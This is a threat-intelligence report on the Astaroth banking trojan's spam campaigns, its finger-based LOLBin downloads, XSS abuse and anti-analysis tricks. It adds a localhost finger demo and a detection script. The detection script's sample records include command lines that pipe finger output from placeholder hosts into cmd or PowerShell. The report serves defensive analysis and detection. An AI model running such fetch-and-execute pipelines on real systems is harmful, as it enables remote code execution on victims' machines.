Threat Intelligence Team
Tempest’s Threat Intelligence team monitors a number of threats, among them the banking trojan Astaroth. In recent years the threat has evolved its tooling with a focus on anti-detection techniques and on maintaining a robust and diversified distribution chain. Recently, Tempest identified that Astaroth operators started to use the Windows finger utility and to exploit websites vulnerable to Cross-Site Scripting (XSS).
Astaroth, also known as Guildma, is a very prolific malware family in terms of the volume of malicious email it sends and the number of infections it causes in order to steal credentials. The threat is maintained by an actor known for spreading a banking trojan with Remote Access Tool (RAT) features, used to extract sensitive information from victims, among other malicious activities.
The infrastructure behind Astaroth is dynamic and highly adaptable: it has resources that automate the installation and configuration of servers, and it uses the services of companies that offer DDoS protection, such as Cloudflare. The trojan also has a series of mechanisms that hinder detection and analysis; if it identifies a process related to security tooling such as debuggers (OllyDbg, WinDbg), process monitors (Process Hacker, Process Monitor) or network monitors (Wireshark), it forces the target machine to restart in an attempt to evade those protection mechanisms.
Massive spamming is one of Astaroth’s most striking features. In campaigns identified in late 2020, Tempest sensors recorded more than 1,000 spam emails per minute on a single day of threat activity. The emails have generic themes and draw the user’s attention by impersonating brands with a good reputation in the market, such as Amazon and AliExpress, as well as public agencies. They carry attachments or malicious links that, when clicked, lead to the download of a file in LNK format (a Microsoft Windows shortcut), which in turn downloads a JScript file that starts the payload installation process.
The JScript has several layers of obfuscation and contains the instructions needed to communicate with the command-and-control (C2) server through HTTP GET requests. The main purpose of these requests is to retrieve the commands needed for the next stage of the infection, which ends with the delivery of Astaroth’s main payload in the form of a DLL.
In recent analyses, Tempest identified that the actors behind the threat started, a few weeks ago, to use finger requests in their attacks so that the threat’s initial payload executes malicious code retrieved from a remote server.
Finger is a utility that ships with Microsoft Windows. It was designed to let a local user retrieve the list of users logged on to a remote machine, or information about a particular remote user. When used for malicious purposes it joins the long list of Windows components that can be abused in attacks, which in this context are called LOLBins.
LOLBin stands for Living-Off-the-Land binary. In the context of malware development, it means using resources already available in the operating system to carry out malicious activity. These components can serve multiple purposes, from executing code retrieved from an external server to encrypting files.
In September 2020, security researchers had already documented that finger could be used to download and run malicious files. In January of this year, experts warned about the use of finger by different attackers to download and install backdoors on victims’ devices.
The use of tools classified as LOLBins is another feature common to Astaroth campaigns: previous campaigns used Windows Management Instrumentation Command-line (WMIC) to download and run malicious artifacts in the background, and ExtExport to load the malicious DLLs associated with the trojan.
According to Tempest’s honeypots, about 10% of the Astaroth campaigns identified at the end of January were exploiting XSS.
Another relevant change concerns the LNK files used to infect victims’ computers. In previous campaigns, the initial payload was a relatively large batch command, obfuscated and embedded in the LNK shortcut. In recent campaigns, the group changed the payload to a simple, unobfuscated command that uses finger to fetch malicious code hosted on the threat’s servers.
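To make concrete why a finger client can be turned into a downloader, here is an added example that is neither Astaroth’s code nor the Windows finger.exe binary: a minimal RFC 1288 finger server and client, both written in Python for this article and both running on localhost. The port, the user names and the returned text are constructed for the demonstration. The client sends a single line and prints back whatever text the server returns, so an operator who controls the server can hand back a script instead of user information.

```python
"""Minimal RFC 1288 finger exchange, run entirely on localhost.

Added example, not Astaroth's code and not the Windows finger.exe client.
It shows why a finger server can double as a download channel: the client
sends one line (a user name, or nothing) over TCP and then prints whatever
bytes the server returns, with no authentication and no format check.
"""
import socket
import threading

# Constructed "user database". The "update" entry stands in for a server
# that returns a script instead of user information; the body is an inert
# echo so the demonstration cannot run anything.
FINGER_RESPONSES = {
    "alice": "Login: alice\r\nName: Alice Example\r\nShell: /bin/sh\r\n",
    "update": "echo stage2 would run here\r\n",
}


def handle_client(conn):
    """Server side: read one CRLF-terminated query, answer, close."""
    with conn:
        conn.settimeout(5)
        query = conn.recv(1024).decode("ascii", "replace").rstrip("\r\n")
        if query.startswith("/W "):   # RFC 1288 verbose switch; ignored here
            query = query[3:]
        reply = FINGER_RESPONSES.get(query, f"finger: {query}: no such user\r\n")
        conn.sendall(reply.encode("ascii"))


def start_finger_server(host="127.0.0.1"):
    """Listen on an OS-chosen port (real finger uses 79/tcp); return (stop_event, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)
    srv.settimeout(0.2)          # lets the accept loop notice the stop flag
    stop = threading.Event()
    port = srv.getsockname()[1]

    def serve():
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            except OSError:
                break
            handle_client(conn)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return stop, port


def finger(user, host, port=79):
    """Client side, equivalent to `finger user@host`: send the query, return the raw reply."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(f"{user}\r\n".encode("ascii"))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("ascii", "replace")


def finger_exchange(user):
    """Spin up the server, run one client query against it, tear it down."""
    stop, port = start_finger_server()
    try:
        return finger(user, "127.0.0.1", port)
    finally:
        stop.set()


if __name__ == "__main__":
    for who in ("alice", "update", "nobody"):
        print(f"$ finger {who}@127.0.0.1")
        print(finger_exchange(who), end="")
```

Nothing in the protocol authenticates the server or constrains the reply; that is the property a `finger user@host | cmd` pipeline relies on, and it is why outbound connections to TCP port 79 from workstations deserve their own detection rule.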
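As an added example (not Tempest’s detection content), the following Python scans constructed process-creation records, shaped like Sysmon Event ID 1 fields, for the trace an unobfuscated finger-based shortcut command would leave: finger output piped into a command interpreter, or finger.exe spawned directly by a script host. The hosts and IP addresses in the sample records are documentation placeholders, and the pipeline shapes are the ones publicly documented for finger used as a downloader, not a copy of any Astaroth sample.

```python
"""Detection logic for finger.exe abused as a downloader.

Added example, not Tempest's detection content. The records are constructed
to mimic Sysmon Event ID 1 fields (Image, CommandLine, ParentImage); the
hosts and IP addresses in them are documentation placeholders.
"""
import re

SAMPLE_EVENTS = [
    # 0: benign, an administrator querying a Unix finger service.
    {"Image": r"C:\Windows\System32\finger.exe",
     "CommandLine": "finger alice@unix-host.corp.example",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    # 1: suspicious, shortcut-launched cmd feeding finger output to a second cmd.
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\Windows\System32\cmd.exe /c finger user@203.0.113.10 | more +2 | cmd",
     "ParentImage": r"C:\Windows\explorer.exe"},
    # 2: suspicious, finger output read by PowerShell from stdin.
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd /c "finger upd@example.test | powershell -"',
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    # 3: benign, the word finger only appears inside a file name.
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c type C:\Users\bob\finger-policy.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
    # 4: suspicious, finger.exe launched directly by a script host.
    {"Image": r"C:\Windows\System32\finger.exe",
     "CommandLine": "finger x@198.51.100.7",
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
]

# finger invoked with a user@host argument; the preceding space/quote/slash
# keeps a path such as \finger-policy.txt from matching.
FINGER_CALL = re.compile(r'(?:^|[\s"/])finger(?:\.exe)?\s+\S*@\S+', re.I)
# its output piped, optionally through `more +N`, into an interpreter.
PIPE_TO_INTERPRETER = re.compile(
    r"\|\s*(?:more\s+\+\d+\s*\|\s*)?(?:cmd|powershell|pwsh)(?:\.exe)?\b", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def classify(event):
    """Return the list of reasons an event is suspicious (empty means benign)."""
    cmd = event["CommandLine"]
    reasons = []
    if FINGER_CALL.search(cmd) and PIPE_TO_INTERPRETER.search(cmd):
        reasons.append("finger output piped into a command interpreter")
    if basename(event["Image"]) == "finger.exe" and basename(event["ParentImage"]) in SCRIPT_HOSTS:
        reasons.append("finger.exe spawned by a script host")
    return reasons


def scan(events):
    """Return (index, reasons) for every suspicious event."""
    hits = []
    for i, e in enumerate(events):
        reasons = classify(e)
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS):
        print(f"event {i}: {'; '.join(reasons)}")
```

Because finger.exe is almost never used legitimately on workstations, a looser rule that alerts on any finger.exe execution with a user@host argument is also defensible; the two checks above are the ones that stay quiet on the benign records in the sample.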
Main events identified by Tempest
● Astaroth’s control panel allows operators to control infected machines, receive real-time notifications when a victim accesses a financial institution, and carry out transactions such as bank transfers and bill payments;
● Over 5,700 Astaroth phishing emails with COVID-19 themes were identified in Tempest’s honeypots;
● An Astaroth campaign used a YouTube channel description to retrieve command-and-control domains from parameters and commands stored in the channel’s “About” section;
● The threat’s operators started to target mobile devices with MegaDroid, a banking trojan that abuses Android accessibility features;
● Analysis of the Astaroth distribution chain reveals a diversified infrastructure with great adaptability for propagating campaigns, allowing hundreds of thousands of emails to be sent daily;
● Astaroth operators use stolen credentials to access domain registration and management services, such as Registro.br, and create new DNS records in previously compromised domains, pointing them at IP addresses protected by a Cloudflare service hired by the attacker;
● Astaroth started to exploit Cross-Site Scripting (XSS) vulnerabilities and to use the Windows finger component to execute code retrieved from remote servers.
The use of living-off-the-land tools gives Astaroth campaigns an advantage in terms of evading detection. This evasive practice is not new in itself, but the use of the finger utility by threats of this kind is recent and potentially dangerous.
Tempest believes that finger facilitates the execution of malicious code, since the threat’s main payload now executes commands made available by the remote server, such as updates to the malware samples. As for the exploitation of websites vulnerable to Cross-Site Scripting, this is a measure that allows operators to hide the true origin of the malicious files. However, since the technique has appeared in only a few spam campaigns, Tempest believes that this functionality is still in a testing phase.
The constant change in Astaroth’s tactics and infrastructure favors its quick adaptation and spread, making it the owner of one of the largest email-based malware distribution chains in Brazil. New developments around this prolific threat will certainly emerge in the cybercrime scene, and Tempest will continue to follow them closely.